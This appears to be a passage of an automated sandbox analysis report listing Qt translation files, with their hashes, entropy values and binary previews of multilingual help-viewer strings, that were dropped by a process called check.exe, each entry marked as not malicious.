                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
